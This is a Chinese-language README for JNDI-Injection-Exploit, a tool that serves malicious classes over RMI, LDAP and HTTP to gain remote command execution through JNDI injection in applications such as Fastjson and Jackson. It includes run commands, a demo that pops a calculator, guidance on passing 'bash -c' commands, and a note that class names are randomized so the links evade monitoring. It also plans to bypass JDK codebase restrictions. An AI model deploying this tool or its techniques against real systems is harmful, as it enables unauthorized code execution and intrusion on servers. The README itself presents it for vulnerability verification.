JNDI-Injection-Exploit —— JNDI 注入利用工具，生成 JNDI 鏈接并啟動后端相關服務，可用于 Fastjson、Jackson 等相關漏洞的驗證。

使用

可執行程序為 jar 包，在命令行中運行以下命令：

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

其中:

• -C?- 遠程 class 文件中要執行的命令。

  （可選項 , 默認命令是 mac 下打開計算器，即"open /Applications/Calculator.app"）

• -A?- 服務器地址，可以是 IP 地址或者域名。

  （可選項 , 默認地址是第一個網卡地址）

注意:

• 要確保?1099、1389、8180?端口可用，不被其他程序占用。

  或者你也可以在 run.ServerStart 類 26~28 行更改默認端口。

• 命令會被作為參數傳入?Runtime.getRuntime().exec()，

  所以需要確保命令傳入 exec() 方法可執行。

  bash等可在shell直接執行的相關命令需要加雙引號，比如說 java -jar JNDI.jar -C "bash -c ..."

示例

本地演示：

1. 啟動 JNDI-Injection-Exploit：

   $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應用環境中，方便解釋用如下代碼模仿漏洞環境：

public static void main(String[] args) throws Exception{
    InitialContext ctx = new InitialContext();
    ctx.lookup("rmi://127.0.0.1/fgf4fp");
}

當上面代碼運行后，應用便會執行相應命令，這里是彈出計算器，沒截圖，可以自己測一下。

截圖是工具的server端日志：

安裝

下面兩種方法都可以得到Jar包

1. 從?Realease直接下載最新的Jar。

2. 把源碼下載到本地然后自行編譯打包。（在Java1.7+ 、Java1.8+ 和 Maven 3.x+環境下測試可以）

   $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git

   $ cd JNDI-Injection-Exploit

   $ mvn clean package -DskipTests

工具實現

1. 首先生成的鏈接后面codebaseClass是6位隨機的，這個是因為不希望讓工具生成的鏈接本身成為一種特征被監控或攔截。
2. 服務器地址實際就是codebase地址，相比于marshalsec中的JNDI server來說，這個工具把JNDI server和HTTP server綁定到一起，并自動啟動HTTP server返回相應class，更自動化了。
3. HTTP server基于jetty實現的，本質上是一個能下載文件的servlet，比較有意思的是我提前編譯好class模板放到resource目錄，然后servlet會讀取class文件，使用ASM框架對讀取的字節碼進行修改，然后插入我們想要執行的命令，返回修改后的字節碼。

待實現

• （已完成EL表達式繞過部分）在更高版本的 JDK 環境中 trustURLCodebase 變量為 false，限制了遠程類的加載，我會找時間把JNDI-Injection-Bypass這個項目的東西融入到本項目中，生成能繞過 JDK 限制 JNDI 鏈接。